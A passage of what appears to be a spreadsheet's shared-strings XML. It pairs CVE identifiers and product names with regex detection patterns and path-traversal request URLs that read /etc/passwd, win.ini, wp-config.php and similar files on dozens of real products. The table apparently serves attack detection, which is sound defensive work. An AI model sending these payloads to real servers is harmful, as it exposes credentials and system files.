    <t>CVE-2019-12593</t>
  </si>
  <si>
    <t>.*?(?:/webmail/calendar/minimizer/index\.php\?style=\.\.%5c\.\.%5c\.\.%5c\.\.%5c\.\.%5c\.\.%5c\.\.%5c\.\.%5cwindows%5cwin\.ini|/webmail/calendar/minimizer/index\.php\?style=\.\.%5c\.\.%5c\.\.%5c\.\.%5c\.\.%5c\.\.%5c\.\.%5c\.\.%5c/etc%5cpasswd).*</t>
  </si>
  <si>
    <t>/webmail/calendar/minimizer/index.php?style=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/etc%5cpasswd|/webmail/calendar/minimizer/index.php?style=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini</t>
  </si>
  <si>
    <t>Ignite Realtime Openfire</t>
  </si>
  <si>
    <t>CVE-2019-18393</t>
  </si>
  <si>
    <t>.*?(?:/plugins/search/\.\..\..\.confopenfire\.xml).*</t>
  </si>
  <si>
    <t>/plugins/search/..\..\..\conf\openfire.xml</t>
  </si>
  <si>
    <t>Jiangnan Online Judge</t>
  </si>
  <si>
    <t>CVE-2019-17538</t>
  </si>
  <si>
    <t>.*?(?:/jnoj/web/polygon/problem/viewfile\?id=1&amp;name=\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd).*</t>
  </si>
  <si>
    <t>/jnoj/web/polygon/problem/viewfile?id=1&amp;name=../../../../../../../etc/passwd</t>
  </si>
  <si>
    <t>CVE-2019-9922</t>
  </si>
  <si>
    <t>.*?(?:/index\.php/component/jemessenger/box_details\?task=download&amp;dw_file=\.\./\.\./\.\./\./\.\./\.\./\.\./etc/passwd).*</t>
  </si>
  <si>
    <t>/index.php/component/jemessenger/box_details?task=download&amp;dw_file=../../.././../../../etc/passwd</t>
  </si>
  <si>
    <t>Nimble Streamer</t>
  </si>
  <si>
    <t>CVE-2019-11013</t>
  </si>
  <si>
    <t>.*?(?:/demo/file/\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd%00filename\.mp4/chunk\.m3u8\?nimblesessionid=1484448).*</t>
  </si>
  <si>
    <t>/demo/file/../../../../../../../../etc/passwd%00filename.mp4/chunk.m3u8?nimblesessionid=1484448</t>
  </si>
  <si>
    <t>Pallets Werkzeug</t>
  </si>
  <si>
    <t>CVE-2019-14322</t>
  </si>
  <si>
    <t>.*?(?:/base_import/static/c:/windows/win\.ini|/base/static/c:/windows/win\.ini|/web/static/c:/windows/win\.ini).*</t>
  </si>
  <si>
    <t>/base/static/c:/windows/win.ini|/web/static/c:/windows/win.ini|/base_import/static/c:/windows/win.ini</t>
  </si>
  <si>
    <t>PilusCart</t>
  </si>
  <si>
    <t>CVE-2019-16123</t>
  </si>
  <si>
    <t>.*?(?:/catalog\.php\?filename=\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd).*</t>
  </si>
  <si>
    <t>/catalog.php?filename=../../../../../../../../../etc/passwd</t>
  </si>
  <si>
    <t>CVE-2019-3799</t>
  </si>
  <si>
    <t>.*?(?:/test/pathtraversal/master/\.\.%252f\.\.%252f\.\.%252f\.\.%252f\.\./etc/passwd).*</t>
  </si>
  <si>
    <t>/test/pathtraversal/master/..%252f..%252f..%252f..%252f../etc/passwd</t>
  </si>
  <si>
    <t>Totaljs</t>
  </si>
  <si>
    <t>CVE-2019-8903</t>
  </si>
  <si>
    <t>.*?(?:/\.%2e/\.%2e/\.%2e/\.%2e/\.%2e/\.%2e/\.%2e/\.%2e/\.%2e/\.%2e/\.%2e/\.%2e/\.%2e/\.%2e/var/www/html/index\.html).*</t>
  </si>
  <si>
    <t>/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/var/www/html/index.html</t>
  </si>
  <si>
    <t>Wavemaker Studio</t>
  </si>
  <si>
    <t>CVE-2019-8982</t>
  </si>
  <si>
    <t>.*?(?:/wavemaker/studioService\.download\?method=getContent&amp;inUrl=file///etc/passwd).*</t>
  </si>
  <si>
    <t>/wavemaker/studioService.download?method=getContent&amp;inUrl=file///etc/passwd</t>
  </si>
  <si>
    <t>Xiaomi Mi WiFi R Routers</t>
  </si>
  <si>
    <t>CVE-2019-18371</t>
  </si>
  <si>
    <t>.*?(?:/api-third-party/download/extdisks\.\./etc/passwd).*</t>
  </si>
  <si>
    <t>/api-third-party/download/extdisks../etc/passwd</t>
  </si>
  <si>
    <t>Artica Proxy Community Edition</t>
  </si>
  <si>
    <t>CVE-2020-13158</t>
  </si>
  <si>
    <t>.*?(?:/fw\.progrss\.details\.php\?popup=\.\.%2f\.\.%2f\.\.%2f\.\.%2f\.\.%2f\.\.%2fetc%2fpasswd).*</t>
  </si>
  <si>
    <t>/fw.progrss.details.php?popup=..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd</t>
  </si>
  <si>
    <t>CVE-2020-3452</t>
  </si>
  <si>
    <t>.*?(?:/\+CSCOT\+/oem-customization\?app=AnyConnect&amp;type=oem&amp;platform=\.\.&amp;resource-type=\.\.&amp;name=%2bCSCOE%2b/portal_inc\.lua|/\+CSCOT\+/translation-table\?type=mst&amp;textdomain=/%2bCSCOE%2b/portal_inc\.lua&amp;default-language&amp;lang=\.\./).*</t>
  </si>
  <si>
    <t>/+CSCOT+/oem-customization?app=AnyConnect&amp;type=oem&amp;platform=..&amp;resource-type=..&amp;name=%2bCSCOE%2b/portal_inc.lua|/+CSCOT+/translation-table?type=mst&amp;textdomain=/%2bCSCOE%2b/portal_inc.lua&amp;default-language&amp;lang=../</t>
  </si>
  <si>
    <t>CVE-2020-26073</t>
  </si>
  <si>
    <t>.*?(?:/dataservice/disasterrecovery/download/token/%2E%2E%2F%2E%2E%2F%2E%2E%2F%2Fetc%2Fpasswd).*</t>
  </si>
  <si>
    <t>/dataservice/disasterrecovery/download/token/%2E%2E%2F%2E%2E%2F%2E%2E%2F%2Fetc%2Fpasswd</t>
  </si>
  <si>
    <t>Citrix</t>
  </si>
  <si>
    <t>CVE-2020-8209</t>
  </si>
  <si>
    <t>.*?(?:/jsp/help-sb-download\.jsp\?sbFileName=\.\./\.\./\.\./etc/passwd).*</t>
  </si>
  <si>
    <t>/jsp/help-sb-download.jsp?sbFileName=../../../etc/passwd</t>
  </si>
  <si>
    <t>GateOne</t>
  </si>
  <si>
    <t>CVE-2020-35736</t>
  </si>
  <si>
    <t>.*?(?:/downloads/\.\.%2f\.\.%2f\.\.%2f\.\.%2f\.\.%2f\.\.%2f\.\.%2f\.\.%2f\.\.%2fetc/passwd).*</t>
  </si>
  <si>
    <t>/downloads/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd</t>
  </si>
  <si>
    <t>LimeSurvey</t>
  </si>
  <si>
    <t>CVE-2020-11455</t>
  </si>
  <si>
    <t>.*?(?:/index\.php/admin/filemanager/sa/getZipFile\?path=/\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd).*</t>
  </si>
  <si>
    <t>/index.php/admin/filemanager/sa/getZipFile?path=/../../../../../../../etc/passwd</t>
  </si>
  <si>
    <t>LionWiki</t>
  </si>
  <si>
    <t>CVE-2020-27191</t>
  </si>
  <si>
    <t>.*?(?:/index\.php\?page=&amp;action=edit&amp;f1=\.//\././/\././/\././/\././/\././/\./etc/passwd&amp;restore=1).*</t>
  </si>
  <si>
    <t>/index.php?page=&amp;action=edit&amp;f1=.//./\.//./\.//./\.//./\.//./\.//./etc/passwd&amp;restore=1</t>
  </si>
  <si>
    <t>Next</t>
  </si>
  <si>
    <t>CVE-2020-5284</t>
  </si>
  <si>
    <t>.*?(?:/_next/static/\.\./server/pages-manifest\.json).*</t>
  </si>
  <si>
    <t>/_next/static/../server/pages-manifest.json</t>
  </si>
  <si>
    <t>Oracle Fusion</t>
  </si>
  <si>
    <t>CVE-2020-14864</t>
  </si>
  <si>
    <t>.*?(?:/analytics/saw\.dll\?getPreviewImage&amp;previewFilePath=/etc/passwd).*</t>
  </si>
  <si>
    <t>/analytics/saw.dll?getPreviewImage&amp;previewFilePath=/etc/passwd|/analytics/saw.dll?bieehome&amp;startPage=1</t>
  </si>
  <si>
    <t>ProcesswireCMS</t>
  </si>
  <si>
    <t>CVE-2020-27467</t>
  </si>
  <si>
    <t>.*?(?:/index\.php\?download=/etc/passwd).*</t>
  </si>
  <si>
    <t>/index.php?download=/etc/passwd</t>
  </si>
  <si>
    <t>SearchBlox</t>
  </si>
  <si>
    <t>CVE-2020-35580</t>
  </si>
  <si>
    <t>.*?(?:/searchblox/servlet/FileServlet\?col=9&amp;url=/etc/passwd).*</t>
  </si>
  <si>
    <t>/searchblox/servlet/FileServlet?col=9&amp;url=/etc/passwd</t>
  </si>
  <si>
    <t>CVE-2020-5405</t>
  </si>
  <si>
    <t>.*?(?:/a/b/%252f\.\.%252f\.\.%252f\.\.%252f\.\.%252f\.\.%252f\.\.%252f\.\.%252fetc/passwd).*</t>
  </si>
  <si>
    <t>/a/b/%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc/passwd</t>
  </si>
  <si>
    <t>ThinkAdmin</t>
  </si>
  <si>
    <t>CVE-2020-25540</t>
  </si>
  <si>
    <t>.*?(?:/admin\.html\?s=admin/api\.Update/get/encode/34392q302x2r1b37382p382x2r1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b2t382r1b342p37373b2s).*</t>
  </si>
  <si>
    <t>/admin.html?s=admin/api.Update/get/encode/34392q302x2r1b37382p382x2r1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b2t382r1b342p37373b2s</t>
  </si>
  <si>
    <t>CVE-2020-11738</t>
  </si>
  <si>
    <t>.*?(?:/wp-admin/admin-ajax\.php\?action=duplicator_download&amp;file=\.\.%2F\.\.%2F\.\.%2F\.\.%2F\.\.%2Fetc%2Fpasswd|/wp-admin/admin-ajax\.php\?action=duplicator_download&amp;file=%2F\.\.%2Fwp-config\.php).*</t>
  </si>
  <si>
    <t>/wp-admin/admin-ajax.php?action=duplicator_download&amp;file=..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd|/wp-admin/admin-ajax.php?action=duplicator_download&amp;file=%2F..%2Fwp-config.php</t>
  </si>
  <si>
    <t>BIQS IT Biqs</t>
  </si>
  <si>
    <t>CVE-2021-39433</t>
  </si>
  <si>
    <t>.*?(?:/download/index\.php\?file=\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd).*</t>
  </si>
  <si>
    <t>/download/index.php?file=../../../../../../../../../etc/passwd</t>
  </si>
  <si>
    <t>Draytek VigorConnect</t>
  </si>
  <si>
    <t>CVE-2021-20123</t>
  </si>
  <si>
    <t>.*?(?:/ACSServer/DownloadFileServlet\?show_file_name=\.\./\.\./\.\./\.\./\.\./\.\./windows/win\.ini&amp;type=uploadfile&amp;path=anything|/ACSServer/DownloadFileServlet\?show_file_name=\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd&amp;type=uploadfile&amp;path=anything).*\|.*?(?:/ACSServer/WebServlet\?act=getMapImg_acs2&amp;filename=\.\./\.\./\.\./\.\./\.\./\.\./\.\./windows/win\.ini|/ACSServer/WebServlet\?act=getMapImg_acs2&amp;filename=\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd).*</t>
  </si>
  <si>
    <t>/ACSServer/DownloadFileServlet?show_file_name=../../../../../../windows/win.ini&amp;type=uploadfile&amp;path=anything|/ACSServer/DownloadFileServlet?show_file_name=../../../../../../etc/passwd&amp;type=uploadfile&amp;path=anything\|/ACSServer/WebServlet?act=getMapImg_acs2&amp;filename=../../../../../../../etc/passwd|/ACSServer/WebServlet?act=getMapImg_acs2&amp;filename=../../../../../../../windows/win.ini</t>
  </si>
  <si>
    <t>FAUST iServer</t>
  </si>
  <si>
    <t>CVE-2021-34805</t>
  </si>
  <si>
    <t>.*?(?:/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows%5cwin\.ini).*</t>
  </si>
  <si>
    <t>/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows%5cwin.ini</t>
  </si>
  <si>
    <t>Hongdian H Devices</t>
  </si>
  <si>
    <t>CVE-2021-28149</t>
  </si>
  <si>
    <t>.*?(?:/log_download\.cgi\?type=\.\./\.\./etc/passwd).*</t>
  </si>
  <si>
    <t>/log_download.cgi?type=../../etc/passwd</t>
  </si>
  <si>
    <t>Hue Magic</t>
  </si>
  <si>
    <t>CVE-2021-25864</t>
  </si>
  <si>
    <t>.*?(?:/hue/assets/\.\.%2F\.\.%2F\.\.%2F\.\.%2F\.\.%2F\.\.%2F\.\.%2Fetc%2fpasswd).*</t>
  </si>
  <si>
    <t>/hue/assets/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2fpasswd</t>
  </si>
  <si>
    <t>Ivanti Avalanche</t>
  </si>
  <si>
    <t>CVE-2021-30497</t>
  </si>
  <si>
    <t>.*?(?:/AvalancheWeb/image\?imageFilePath=C:/windows/win\.ini).*</t>
  </si>
  <si>
    <t>/AvalancheWeb/image?imageFilePath=C:/windows/win.ini</t>
  </si>
  <si>
    <t>Jellyfin</t>
  </si>
  <si>
    <t>CVE-2021-21402</t>
  </si>
  <si>
    <t>.*?(?:/Videos/1/hls/m/\.\.%5C\.\.%5C\.\.%5C\.\.%5C\.\.%5C\.\.%5CWindows%5Cwin\.ini/stream\.mp3/|/Audio/1/hls/\.\.%5C\.\.%5C\.\.%5C\.\.%5C\.\.%5C\.\.%5CWindows%5Cwin\.ini/stream\.mp3/).*</t>
  </si>
  <si>
    <t>/Videos/1/hls/m/..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini/stream.mp3/|/Audio/1/hls/..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini/stream.mp3/</t>
  </si>
  <si>
    <t>CVE-2021-28377</t>
  </si>
  <si>
    <t>.*?(?:/index\.php/component/chronoforums2/profiles/avatar/u1\?tvout=file&amp;av=\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd).*</t>
  </si>
  <si>
    <t>/index.php/component/chronoforums2/profiles/avatar/u1?tvout=file&amp;av=../../../../../../../etc/passwd</t>
  </si>
  <si>
    <t>MERCUSYS Mercury X Router</t>
  </si>
  <si>
    <t>CVE-2021-23241</t>
  </si>
  <si>
    <t>.*?(?:/loginLess/\.\./\.\./etc/passwd).*</t>
  </si>
  <si>
    <t>/loginLess/../../etc/passwd</t>
  </si>
  <si>
    <t>CVE-2021-41277</t>
  </si>
  <si>
    <t>.*?(?:/api/geojson\?url=file:///c://windows/win\.ini|/api/geojson\?url=file:///etc/passwd).*</t>
  </si>
  <si>
    <t>/api/geojson?url=file:///etc/passwd|/api/geojson?url=file:///c://windows/win.ini</t>
  </si>
  <si>
    <t>CVE-2021-24227</t>
  </si>
  <si>
    <t>.*?(?:/\?patron_only_image=\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd&amp;patreon_action=serve_patron_only_image).*</t>
  </si>
  <si>
    <t>/?patron_only_image=../../../../../../../../../../etc/passwd&amp;patreon_action=serve_patron_only_image</t>
  </si>
  <si>
    <t>TermTalk Server</t>
  </si>
  <si>
    <t>CVE-2021-35380</t>
  </si>
  <si>
    <t>.*?(?:/file\?valore=\.\./\.\./\.\./\.\./\.\./windows/win\.ini).*</t>
  </si>
  <si>
    <t>/file?valore=../../../../../windows/win.ini</t>
  </si>
  <si>
    <t>CVE-2021-39316</t>
  </si>
  <si>
    <t>.*?(?:/\?action=dzsap_download&amp;link=\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd).*</t>
  </si>
  <si>
    <t>/?action=dzsap_download&amp;link=../../../../../../../../../../../../../etc/passwd</t>
  </si>
  <si>
    <t>kkFileview</t>
  </si>
  <si>
    <t>CVE-2021-43734</t>
  </si>
  <si>
    <t>.*?(?:/getCorsFile\?urlPath=file:///c://windows/win\.ini|/getCorsFile\?urlPath=file:///etc/passwd).*</t>
  </si>
  <si>
    <t>/getCorsFile?urlPath=file:///etc/passwd|/getCorsFile?urlPath=file:///c://windows/win.ini</t>
  </si>
  <si>
    <t>CVE-2022-47501</t>
  </si>
  <si>
    <t>.*?(?:/solr/solrdefault/debug/dump\?param=ContentStreams&amp;stream\.url=file://.*?|c:/windows/win\.ini|/etc/passwd).*</t>
  </si>
  <si>
    <t>c:/windows/win.ini|/solr/solrdefault/debug/dump?param=ContentStreams&amp;stream.url=file://{{path}}|/etc/passwd</t>
  </si>
  <si>
    <t>BigAnt Server</t>
  </si>
  <si>
    <t>CVE-2022-23347</t>
  </si>
  <si>
    <t>.*?(?:/index\.php/Pan/ShareUrl/downloadSharedFile\?true_path=\.\./\.\./\.\./\.\./\.\./\.\./windows/win\.ini&amp;file_name=win\.ini).*</t>
  </si>
  <si>
    <t>/index.php/Pan/ShareUrl/downloadSharedFile?true_path=../../../../../../windows/win.ini&amp;file_name=win.ini</t>
  </si>
  <si>
    <t>DVDFab Player/PlayerFab</t>
  </si>
  <si>
    <t>CVE-2022-25216</t>
  </si>
  <si>
    <t>.*?(?:/download/C%3a%2fwindows%2fsystem\.ini).*</t>
  </si>
  <si>
    <t>/download/C%3a%2fwindows%2fsystem.ini</t>
  </si>
  <si>
    <t>Gitblit</t>
  </si>
  <si>
    <t>CVE-2022-31268</t>
  </si>
  <si>
    <t>.*?(?:/resources//\.\./WEB-INF/web\.xml).*</t>
  </si>
  <si>
    <t>/resources//../WEB-INF/web.xml</t>
  </si>
  <si>
    <t>LearnPress Plugin</t>
  </si>
  <si>
    <t>CVE-2022-47615</t>
  </si>
  <si>
    <t>.*?(?:/wp-json/lp/v1/courses/archive-course\?template_path=\.\.%2F\.\.%2F\.\.%2Fetc%2Fpasswd&amp;return_type=html).*</t>
  </si>
  <si>
    <t>/wp-json/lp/v1/courses/archive-course?template_path=..%2F..%2F..%2Fetc%2Fpasswd&amp;return_type=html</t>
  </si>
  <si>
    <t>Omnia MPX</t>
  </si>
  <si>
    <t>CVE-2022-36642</t>
  </si>
  <si>
    <t>.*?(?:/logs/downloadMainLog\?fname=\.\./\.\./\.\./\.\./\.\./\.\./\.\.///config/MPXnode/www/appConfig/userDB\.json|/logs/downloadMainLog\?fname=\.\./\.\./\.\./\.\./\.\./\.\./\.\.//etc/passwd).*</t>
  </si>
  <si>
    <t>/logs/downloadMainLog?fname=../../../../../../..//etc/passwd|/logs/downloadMainLog?fname=../../../../../../..///config/MPXnode/www/appConfig/userDB.json</t>
  </si>
  <si>
    <t>Piano LED Visualizer</t>
  </si>
  <si>
    <t>CVE-2022-24900</t>
  </si>
  <si>
    <t>.*?(?:/api/change_setting\?second_value=no_reload&amp;disable_sequence=true&amp;value=\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd).*</t>
  </si>
  <si>
    <t>/api/change_setting?second_value=no_reload&amp;disable_sequence=true&amp;value=../../../../../../../etc/passwd</t>
  </si>
  <si>
    <t>SolarView Compact</t>
  </si>
  <si>
    <t>CVE-2022-29298</t>
  </si>
  <si>
    <t>.*?(?:/downloader\.php\?file=\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd%00\.jpg).*</t>
  </si>
  <si>
    <t>/downloader.php?file=../../../../../../../../../../../../../etc/passwd%00.jpg</t>
  </si>
  <si>
    <t>CVE-2022-4063</t>
  </si>
  <si>
    <t>.*?(?:/wp-admin/admin-ajax\.php\?action=inpost_gallery_get_gallery&amp;popup_shortcode_key=inpost_fancy&amp;popup_shortcode_attributes=eyJwYWdlcGF0aCI6ICJmaWxlOi8vL2V0Yy9wYXNzd2QifQ==).*</t>
  </si>
  <si>
    <t>/wp-admin/admin-ajax.php?action=inpost_gallery_get_gallery&amp;popup_shortcode_key=inpost_fancy&amp;popup_shortcode_attributes=eyJwYWdlcGF0aCI6ICJmaWxlOi8vL2V0Yy9wYXNzd2QifQ==</t>
  </si>
  <si>
    <t>Gibbon</t>
  </si>
  <si>
    <t>CVE-2023-34598</t>
  </si>
  <si>
    <t>.*?(?:/\?q=\./gibbon\.sql).*</t>
  </si>
  <si>
    <t>/?q=./gibbon.sql</t>
  </si>
  <si>
    <t>Jeecg P Biz Chat</t>
  </si>
  <si>
    <t>CVE-2023-33510</t>
  </si>
  <si>
    <t>.*?(?:/chat/imController/showOrDownByurl\.do\?dbPath=\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd).*</t>
  </si>
  <si>
    <t>/chat/imController/showOrDownByurl.do?dbPath=../../../../../../etc/passwd</t>
  </si>
  <si>
    <t>Nuovo Spreadsheet Reader</t>
  </si>
  <si>
    <t>CVE-2023-29887</t>
  </si>
  <si>
    <t>.*?(?:/nuovo/spreadsheet-reader/test\.php\?File=\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd|/spreadsheet-reader/test\.php\?File=\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd).*</t>
  </si>
  <si>
    <t>/spreadsheet-reader/test.php?File=../../../../../../../../../../../etc/passwd|/nuovo/spreadsheet-reader/test.php?File=../../../../../../../../../../../etc/passwd</t>
  </si>
  <si>
    <t>ShokoServer System</t>
  </si>
  <si>
    <t>CVE-2023-43662</t>
  </si>
  <si>
    <t>.*?(?:/api/Image/withpath/C:Windowswin\.ini).*</t>
  </si>
  <si>
    <t>/api/Image/withpath/C:\Windows\win.ini</t>
  </si>
  <si>
    <t>SonicWall SMA LFI</t>
  </si>
  <si>
    <t>CVE-2023-0126</t>
  </si>
  <si>
    <t>.*?(?:/images//////////////////\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd).*</t>
  </si>
  <si>
    <t>/images//////////////////../../../../../../../../etc/passwd</t>
  </si>
  <si>
    <t>Artica Proxy</t>
  </si>
  <si>
    <t>CVE-2024-2053</t>
  </si>
  <si>
    <t>.*?(?:/images\.listener\.php\?uri=1&amp;mailattach=\.\.\./\./\.\.\./\./\.\.\./\./\.\.\./\./\.\.\./\./epasswdtc/ppasswdasswd).*</t>
  </si>
  <si>
    <t>/images.listener.php?uri=1&amp;mailattach=..././..././..././..././..././epasswdtc/ppasswdasswd</t>
  </si>
  <si>
    <t>Devika</t>
  </si>
  <si>
    <t>CVE-2024-5334</t>
  </si>
  <si>
    <t>.*?(?:/api/get-browser-snapshot\?snapshot_path=/etc/passwd).*</t>
  </si>
  <si>
    <t>/api/get-browser-snapshot?snapshot_path=/etc/passwd</t>
  </si>
  <si>
    <t>Docassemble</t>
  </si>
  <si>
    <t>CVE-2024-27292</t>
  </si>
  <si>
    <t>.*?(?:/interview\?i=/etc/passwd).*</t>
  </si>
  <si>
    <t>/interview?i=/etc/passwd</t>
  </si>
  <si>
    <t>MasterSAM Star Gate</t>
  </si>
  <si>
    <t>CVE-2024-55457</t>
  </si>
  <si>
    <t>.*?(?:/adama/adama/downloadService\?type=1&amp;file=\.\./\.\./\.\./\.\./etc/passwd).*</t>
  </si>
  <si>
    <t>/adama/adama/downloadService?type=1&amp;file=../../../../etc/passwd</t>
  </si>
  <si>
    <t>CVE-2024-12209</t>
  </si>
  <si>
    <t xml:space="preserve">.*?(?:/\?umbrella-restore=1&amp;filename=\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd </t>
  </si>
  <si>
    <t>/|/?umbrella-restore=1&amp;filename=../../../../../../etc/passwd</t>
  </si>
  <si>
    <t>Kubio AI Page Builder</t>
  </si>
  <si>
    <t>CVE-2025-2294</t>
  </si>
  <si>
    <t xml:space="preserve">.*?(?:/\?__kubio-site-edit-iframe-preview=1&amp;__kubio-site-edit-iframe-classic-template=\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd </t>
  </si>
  <si>
    <t>/?__kubio-site-edit-iframe-preview=1&amp;__kubio-site-edit-iframe-classic-template=../../../../../../../../etc/passwd|/</t>
  </si>
  <si>
    <t>Moodle Jmol Filter</t>
  </si>
  <si>
    <t>CVE-2025-34031</t>
  </si>
  <si>
    <t>.*?(?:/filter/jmol/js/jsmol/php/jsmol\.php\?call=getRawDataFromDatabase&amp;query=file:///etc/passwd).*</t>
  </si>
  <si>
    <t>/filter/jmol/js/jsmol/php/jsmol.php?call=getRawDataFromDatabase&amp;query=file:///etc/passwd</t>
  </si>
  <si>
    <t>.*?(?:/solr/.*?/debug/dump\?stream\.url=file:///\.\./\.\./\.\./\.\./\.\./Windows/win\.ini&amp;param=ContentStream|/solr/.*?/debug/dump\?stream\.url=file:///etc/passwd&amp;param=ContentStream|/solr/admin/cores\?wt=json).*</t>
  </si>
  <si>
    <t>/solr/admin/cores?wt=json|/solr/{{core}}/debug/dump?stream.url=file:///etc/passwd&amp;param=ContentStream|/solr/{{core}}/debug/dump?stream.url=file:///../../../../../Windows/win.ini&amp;param=ContentStream</t>
  </si>
  <si>
    <t>.*?(?:/WebReport/ReportServer\?op=chart&amp;cmd=get_geo_json&amp;resourcepath=privilege\.xml|/report/ReportServer\?op=chart&amp;cmd=get_geo_json&amp;resourcepath=privilege\.xml).*</t>
  </si>
  <si>
    <t>/WebReport/ReportServer?op=chart&amp;cmd=get_geo_json&amp;resourcepath=privilege.xml|/report/ReportServer?op=chart&amp;cmd=get_geo_json&amp;resourcepath=privilege.xml</t>
  </si>
  <si>
    <t>Grafana</t>
  </si>
  <si>
    <t>.*?(?:/public/plugins/.*?/\.\./\.\./\.\./\.\./\.\./conf/defaults\.ini).*</t>
  </si>
  <si>
    <t>/public/plugins/{{pluginSlug}}/../../../../../conf/defaults.ini</t>
  </si>
  <si>
    <t>.*?(?:/index\.php\?option=com_easyshop&amp;task=ajax\.loadImage&amp;file=Li4vLi4vY29uZmlndXJhdGlvbi5waHA=).*</t>
  </si>
  <si>
    <t>/index.php?option=com_easyshop&amp;task=ajax.loadImage&amp;file=Li4vLi4vY29uZmlndXJhdGlvbi5waHA=</t>
  </si>
  <si>
    <t>.*?(?:/index\.php\?option=com_jvehicles&amp;controller=\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd%00).*</t>
  </si>
  <si>
    <t>/index.php?option=com_jvehicles&amp;controller=../../../../../../../../../../etc/passwd%00</t>
  </si>
  <si>
    <t>AsanhamayeshCMS</t>
  </si>
  <si>
    <t>.*?(?:/downloadfile\.php\?file=\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd).*</t>
  </si>
  <si>
    <t>/downloadfile.php?file=../../../../../../../../../../etc/passwd</t>
  </si>
  <si>
    <t>Carel pCOWeb HVAC BACnet Gateway</t>
  </si>
  <si>
    <t>.*?(?:/usr-cgi/logdownload\.cgi\?file=\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd).*</t>
  </si>
  <si>
    <t>/usr-cgi/logdownload.cgi?file=../../../../../../../../etc/passwd</t>
  </si>
  <si>
    <t>FastBee</t>
  </si>
  <si>
    <t xml:space="preserve">.*?(?:/prod-api/iot/tool/download\?fileName=/\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd </t>
  </si>
  <si>
    <t>/prod-api/iot/tool/download?fileName=/../../../../../../../../../etc/passwd|/</t>
  </si>
  <si>
    <t>FeiFeiCMS</t>
  </si>
  <si>
    <t>.*?(?:/index\.php\?s=Admin-Data-down&amp;id=\.\./\.\./Conf/config\.php).*</t>
  </si>
  <si>
    <t>/index.php?s=Admin-Data-down&amp;id=../../Conf/config.php</t>
  </si>
  <si>
    <t>.*?(?:/Visitor//%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fwindows%5Cwin\.ini|/Visitor/bin/WebStrings\.srf\?file=\.\.%2f\.\.%2f\.\.%2f\.\.%2f\.\.%2f\.\.%2f\.\.%2f\.\.%2f\.\.%2f\.\.%2f\.\.%2fwindows/win\.ini&amp;obj_name=aaa).*</t>
  </si>
  <si>
    <t>/Visitor//%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fwindows%5Cwin.ini|/Visitor/bin/WebStrings.srf?file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows/win.ini&amp;obj_name=aaa</t>
  </si>
  <si>
    <t>Hrsale</t>
  </si>
  <si>
    <t>.*?(?:/download\?type=files&amp;filename=\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd).*</t>
  </si>
  <si>
    <t>/download?type=files&amp;filename=../../../../../../../../etc/passwd</t>
  </si>
  <si>
    <t>Interlib</t>
  </si>
  <si>
    <t>.*?(?:/interlib/report/ShowImage\?localPath=C:Windowssystem\.ini|/interlib/report/ShowImage\?localPath=etc/passwd).*</t>
  </si>
  <si>
